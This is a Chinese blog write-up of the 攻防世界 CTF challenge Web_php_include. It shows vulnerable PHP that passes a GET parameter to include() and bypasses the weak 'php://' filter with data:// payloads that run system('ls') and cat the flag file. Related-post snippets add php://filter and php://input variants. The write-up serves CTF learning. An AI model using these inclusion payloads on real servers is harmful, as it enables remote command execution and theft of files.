攻防世界 web_php_include

最新推荐文章于 2024-05-11 22:27:02 发布
最新推荐文章于 2024-05-11 22:27:02 发布
阅读量279 收藏
点赞数
分类专栏: ctf刷题纪 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52268949/article/details/122627366
版权
Web_php_include

进入题目源码直接出来了

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

看见了include函数并且发现过滤了php://,由此估计需要使用伪协议来读取flag内容,由于过滤掉了php,所以我们直接使用data://协议来执行指令

payload

?page=data://text/plain,<?system(%27ls%27);?>

在这里插入图片描述

然后又是cat查看一下就行

page=data://text/plain,<?system(%27cat%20fl4gisisish3r3.php%27);?>

但是页面没有回显任何内容,还以为我哪里做错了原来查看源码就发现了flag
在这里插入图片描述

听门外雪花飞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 -- fileinclude
weixin_48031371的博客
09-14 3300
攻防世界 -- fileinclude
常见Web安全漏洞的实际案例和攻防技术
02-15
### 常见Web安全漏洞的实际案例和攻防技术 #### 一、SQL注入攻击与防范 **实际案例** 在Web开发中,SQL注入是一种常见的安全威胁,它允许攻击者通过向应用程序发送恶意SQL代码来操纵数据库。例如,考虑一个简单的...
攻防世界WEB练习-fileinclude
不知名白帽的博客
08-31 6720
攻防世界WEB练习-fileinclude
fileinclude攻防世界web
qq_53099119的博客
10-01 1476
接下来构造payload,使用filter伪协议来读取flag.php的源码: payload: language=php://filter/convert.base64-encode/resource=/var/www/html/flag 注意,由于在源码分析中,对lan最后拼接了“.php”,因此在payload中flag后不用加。 执行后即可获得flag的base64编码。
攻防世界---fileinclude
m0_72447684的博客
10-11 1192
攻防世界---fileinclude
[wp] 攻防世界 Web_php_include
MercyLin的博客
09-28 6816
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> strstr是对大小写敏感的,用大写PHP绕过...
PHP常见安全漏洞攻防研究.pdf
01-05
"PHP常见安全漏洞攻防研究" PHP 是一种广泛使用的服务器端脚本语言,拥有强大功能和灵活的语法,使得 Web 开发者能够快速开发包含动态页面的 Web 应用程序。然而,由于 PHP开发人员要求很低和开发人员的疏忽,...
web渗透测试技巧(下)
10-12
- **漏洞示例**:例如,在以下代码中,`$_GET['file']`可以直接被用户控制,如果开发者没有对其进行适当的验证,则攻击者可以通过修改URL中的`file`参数来读取服务器上的任何文件:`include($_GET['file']);...
Mang0-php文件包含漏洞.zip
03-12
PHP中,`include`、`require`、`include_once`和`require_once`等函数用于将其他文件的内容插入到当前脚本中。当这些函数的参数来自不受信任的源,如HTTP请求,就可能引发问题。 ### Mang0的案例分析 "Mang0-php...
攻防世界—file_include
小缪的博客
06-10 2872
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
攻防世界-web-fileinclude
最新发布
MateSnake的博客
05-11 330
攻防世界-web-fileinclude
攻防世界XCTF:Web_php_include
末初的CSDN博客
03-13 872
这里需要绕过strstr()函数查找字符,使用php伪协议,不然会被替换为空。 针对strstr()函数对大小写敏感,绕过使用php://input流 也就是说,如果使用php://input 我们传入的数据就能相当于以post包的形式,传入php变量执行。 Cat fl4gisisish3r3.php查看内容 ...
攻防世界Web_PHP_Include
Mrs_H的博客
10-04 578
攻防世界Web_PHP_Include 这是一道来自攻防世界web高手进阶题的其中一道题,题目很水,但是身为小白的我也遭遇到了各种各样的问题。所以写一下这道题我所用的wp思路,还有对于其他思路的一些看法。 法一 首先,我们先拿到了这道题的在线场景,打开一看 再结合着题目的意思这是一道文件包含题同时他过滤掉了php://伪协议,我第一反应就是换一个伪协议,将php://换成data://text/plain; 于是构造一个payload:?page=data://text/plain,<?%20sy
攻防世界(fileinclude
……
09-13 7586
攻防世界文件包含题目
攻防世界-fileinclude
qq_70851535的博客
05-21 128
第二:构造过滤payload:php://fil1ter/=con1vert.ba1se64-e1ncode/re1source=check.php。过滤提示没了,证明绕过成功。发现是对convert.base64-encode进行过滤。发现被过滤了,黑名单过滤。第三:burpsuite抓包。
攻防世界 fileinclude
qq_73861475的博客
05-20 495
因为变量是用cookie传参的,所以我们构造的playload是关于cookie的,在bp里面将cookie更改为我们构造的,最后就会得到。红线圈出来的就是flag的base64编码值,所以我们要将红线圈出来的值进行base64解码就会得到flag。include函数用php://filter伪协议来绕过。我们可以看这个页面知道flag在flag.php这个文件中,而且还有文件路径为。首先打开题目进入环境,在此之前题目没有太多提示。传参,所以我们要改cookie的值。可以用于读取、写入文件等函数。
攻防世界-file_include
m0_49025459的博客
12-18 7062
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
攻防世界】file_include
m0_74979597的博客
09-13 1608
这个参数filename,,用户可以通过这个参数找到漏洞;1.当我使用filename=
攻防世界-Web_php_include详解
Mr_helloword的博客
08-11 8784
Web_php_include 源代码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析: strstr(): 定义和用法: 搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种漏洞,应该对包含的文件进行严格验证,确保只包含可信的文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值